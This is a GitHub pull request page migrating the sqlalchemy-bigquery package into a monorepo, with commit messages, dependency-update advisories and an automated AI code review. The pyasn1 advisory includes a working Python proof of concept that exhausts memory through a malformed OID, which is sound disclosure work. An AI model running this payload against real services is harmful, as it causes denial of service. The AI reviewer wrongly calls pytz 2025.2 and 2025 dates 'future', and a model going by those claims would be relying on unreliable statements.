* adds debugging to noxfile and tweaks to correct coverage * adds a decorator to help calculate the duration of a nox session * Minor tweaks. * adds back in a pip freeze that was accidentally removed. * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
…en Python 3.9 is used. (#1227) * chore(deps): update all dependencies * add checks to avoid overwriting dependency when using python 3.9 * Update samples/snippets/requirements.txt * Update renovate.json * updates name of test to match upstream refactor * blocks a class with tests for content BQ does not support * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Mend Renovate <bot@renovateapp.com> Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Source-Link: googleapis/synthtool@16790a3 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
🤖 I have created a release *beep* *boop* --- ## [1.16.0](googleapis/python-bigquery-sqlalchemy@v1.15.0...v1.16.0) (2025-11-05) ### Features * Add support for Python 3.14 ([#1278](googleapis/python-bigquery-sqlalchemy#1278)) ([c09a009](googleapis/python-bigquery-sqlalchemy@c09a009)) * Remove python 3.8 support ([#1215](googleapis/python-bigquery-sqlalchemy#1215)) ([632d6ef](googleapis/python-bigquery-sqlalchemy@632d6ef)) --- This PR was generated with [Release Please](https://github.com/googleapis/release-please). See [documentation](https://github.com/googleapis/release-please#release-please). Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
Towards googleapis/librarian#2456 --------- Co-authored-by: ohmayr <omairn@google.com>
This PR effectively moves ownership for this repo to the python language team, and removes api-bigquery as the defacto code owner.
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.5.0` -> `==2.6.0` |  |  | ### GitHub Vulnerability Alerts #### [CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53) ## Impact urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`). However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. ## Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly. ## Remediation Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5. If upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers["content-encoding"]` contains a safe number of encodings before reading the response content. #### [CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data. ### Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources. `stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly. ### Remediation Upgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount. If your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3. ### Credits The issue was reported by @​Cycloctane. Supplemental information was provided by @​stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/). --- ### Release Notes <details> <summary>urllib3/urllib3 (urllib3)</summary> ### [`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0) \================== ## Security - Fixed a security issue where streaming API could improperly handle highly compressed HTTP content ("decompression bombs") leading to excessive resource consumption even when a small amount of data was requested. Reading small chunks of compressed data is safer and much more efficient now. (`GHSA-2xpw-w6gg-jr37 <https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37>`\_\_) - Fixed a security issue where an attacker could compose an HTTP response with virtually unlimited links in the `Content-Encoding` header, potentially leading to a denial of service (DoS) attack by exhausting system resources during decoding. The number of allowed chained encodings is now limited to 5. (`GHSA-gm62-xv2j-4w53 <https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53>`\_\_) .. caution:: - If urllib3 is not installed with the optional `urllib3[brotli]` extra, but your environment contains a Brotli/brotlicffi/brotlipy package anyway, make sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to benefit from the security fixes and avoid warnings. Prefer using `urllib3[brotli]` to install a compatible Brotli package automatically. - If you use custom decompressors, please make sure to update them to respect the changed API of `urllib3.response.ContentDecoder`. ## Features - Enabled retrieval, deletion, and membership testing in `HTTPHeaderDict` using bytes keys. (`#​3653 <https://github.com/urllib3/urllib3/issues/3653>`\_\_) - Added host and port information to string representations of `HTTPConnection`. (`#​3666 <https://github.com/urllib3/urllib3/issues/3666>`\_\_) - Added support for Python 3.14 free-threading builds explicitly. (`#​3696 <https://github.com/urllib3/urllib3/issues/3696>`\_\_) ## Removals - Removed the `HTTPResponse.getheaders()` method in favor of `HTTPResponse.headers`. Removed the `HTTPResponse.getheader(name, default)` method in favor of `HTTPResponse.headers.get(name, default)`. (`#​3622 <https://github.com/urllib3/urllib3/issues/3622>`\_\_) ## Bugfixes - Fixed redirect handling in `urllib3.PoolManager` when an integer is passed for the retries parameter. (`#​3649 <https://github.com/urllib3/urllib3/issues/3649>`\_\_) - Fixed `HTTPConnectionPool` when used in Emscripten with no explicit port. (`#​3664 <https://github.com/urllib3/urllib3/issues/3664>`\_\_) - Fixed handling of `SSLKEYLOGFILE` with expandable variables. (`#​3700 <https://github.com/urllib3/urllib3/issues/3700>`\_\_) ## Misc - Changed the `zstd` extra to install `backports.zstd` instead of `zstandard` on Python 3.13 and before. (`#​3693 <https://github.com/urllib3/urllib3/issues/3693>`\_\_) - Improved the performance of content decoding by optimizing `BytesQueueBuffer` class. (`#​3710 <https://github.com/urllib3/urllib3/issues/3710>`\_\_) - Allowed building the urllib3 package with newer setuptools-scm v9.x. (`#​3652 <https://github.com/urllib3/urllib3/issues/3652>`\_\_) - Ensured successful urllib3 builds by setting Hatchling requirement to >= 1.27.0. (`#​3638 <https://github.com/urllib3/urllib3/issues/3638>`\_\_) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery-sqlalchemy). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4zMi4yIiwidXBkYXRlZEluVmVyIjoiNDIuMzIuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==--> Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` → `==0.6.2` |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq) ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024)) print("[*] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[*] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 256**2: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 256**3: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[*] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[*] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[*] Test completed") ``` Screenshots with the results: #### DoS <img width="944" height="207" alt="Screenshot_20251219_160840" src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f" /> <img width="931" height="231" alt="Screenshot_20251219_152815" src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa" /> #### Leak analysis A potential heap leak was investigated but came back clean: ``` [*] Creating 1000KB payload... [*] Decoding with pyasn1... [*] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [*] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @​..... @​.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @​..... @​.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @​..... @​..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @​..... @​..... @​. [*] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. ### Recommendation Add a limit to the allowed bytes in the decoder. --- ### Release Notes <details> <summary>pyasn1/pyasn1 (pyasn1)</summary> ### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026) [Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) - CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007) - Added support for Python 3.14 [pr #​97](https://redirect.github.com/pyasn1/pyasn1/pull/97) - Added SECURITY.md policy - Fixed unit tests failing due to missing code [issue #​91](https://redirect.github.com/pyasn1/pyasn1/issues/91) [pr #​92](https://redirect.github.com/pyasn1/pyasn1/pull/92) - Migrated to pyproject.toml packaging [pr #​90](https://redirect.github.com/pyasn1/pyasn1/pull/90) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery-sqlalchemy). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi43NC41IiwidXBkYXRlZEluVmVyIjoiNDIuNzQuNSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
…chemy/main' into migration.python-bigquery-sqlalchemy.migration.2026-03-06_19-24-38.migrate
Contributor
Summary of ChangesHello, I'm Gemini Code Assist1! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed! This pull request completes a significant refactoring effort by migrating the Highlights
Changelog
Activity
Using Gemini Code AssistThe full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips. Invoking Gemini You can request assistance from Gemini at any point by creating a comment using either
Customization To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a Limitations & Feedback Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here. You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension. Footnotes
|
![gemini-code-assist[bot]](https://avatars.githubusercontent.com/in/956858?s=60&v=4){kind=small}
Contributor
There was a problem hiding this comment.
Code Review
This pull request migrates the sqlalchemy-bigquery package into the monorepo. The changes consist of adding a large number of files, including source code, tests, documentation, and CI/CD configuration. My review has identified several issues, primarily related to stale information and configurations from the old repository. There are stale links in issue templates, incorrect repository metadata, and outdated Python version support information. Additionally, there are critical issues with dependency files specifying non-existent future versions of packages, which will break development and sample setups. I've also noted a potential legal issue with an outdated copyright notice in the LICENSE file. All identified comments have been retained, with some enhanced by referencing relevant repository rules regarding Python version support and breaking changes.
Note: Security Review did not run due to the size of the PR.
I am having trouble creating individual review comments. Click here to see my feedback.
packages/sqlalchemy-bigquery/dev_requirements.txt (5)
The pytz package is pinned to version 2025.2, which is a non-existent future release. This will cause the development environment setup to fail. Please pin it to a valid, existing version.
packages/sqlalchemy-bigquery/samples/snippets/requirements.txt (27)
The pytz package is pinned to version 2025.2, which is a non-existent future release. This will cause pip install to fail when setting up the samples. Please pin it to a valid, existing version.
packages/sqlalchemy-bigquery/LICENSE (3)
The copyright notice only lists the original author from 2017. Since Google has taken over maintenance and many files now include a "Copyright 2024 Google LLC" header, this LICENSE file should be updated to reflect the current copyright holders, including Google LLC. Please verify and update the copyright attribution.
packages/sqlalchemy-bigquery/setup.py (125)
The python_requires is set to >=3.8, but the changelog and other configuration files indicate that support for Python 3.8 has been dropped and the minimum supported version is 3.9. Please update this to >=3.9 to ensure correct package compatibility.
python_requires=">=3.9, <3.15",
References
- When a release introduces breaking changes in environment requirements, such as dropping support for specific Python versions, prefer a minor version bump over a patch version bump.
- Python 3.14 is a valid Python version and should be supported in configurations.
packages/sqlalchemy-bigquery/.github/ISSUE_TEMPLATE/bug_report.md (13)
](https://renovatebot.com){kind=link}
The link to search for existing issues points to the old repository googleapis/python-bigquery-sqlalchemy. This should be updated to point to the issue tracker for this package's new location within the monorepo.
packages/sqlalchemy-bigquery/.github/PULL_REQUEST_TEMPLATE.md (2)
The link to open a new issue points to the old repository googleapis/python-bigquery-sqlalchemy. This should be updated to point to the correct issue creation URL for this package's new location.
packages/sqlalchemy-bigquery/.github/header-checker-lint.yml (15)
This JSON file is missing a newline at the end. It's a common convention for text files to end with a newline.
}
packages/sqlalchemy-bigquery/.kokoro/test-samples-impl.sh (36)
The comment regarding virtualenv==20.26.6 for Python 3.7 compatibility appears to be stale, as support for Python 3.7 has been removed. Please update or remove this comment to avoid confusion.
packages/sqlalchemy-bigquery/.repo-metadata.json (8)
The repo field points to the old standalone repository googleapis/python-bigquery-sqlalchemy. This should be updated to reflect the package's new location within this monorepo. This may also resolve stale links in other generated files.
packages/sqlalchemy-bigquery/CHANGELOG.md (17)
This changelog entry, and several others that follow, have release dates set in the future (e.g., 2025). This seems to be an error and should be corrected to reflect the actual release dates.
packages/sqlalchemy-bigquery/README.rst (54)
The supported Python version range is listed as Python >= 3.9, <3.14. However, other files such as noxfile.py and CONTRIBUTING.rst indicate that Python 3.14 is supported. Please update this to be consistent, for example, to Python >= 3.9, <3.15.
Python >= 3.9, <3.15
References
- Python 3.14 is a valid Python version and should be supported in configurations.
packages/sqlalchemy-bigquery/sqlalchemy_bigquery/base.py (1424)
The link in this docstring points to an issue in the old repository. Please update it to point to the correct location if the issue has been migrated, or remove it if it's no longer relevant.
parthea
added
the
do not merge
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
20 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
See #10990.
This PR should be merged with a merge-commit, not a squash-commit, in order to preserve the git history.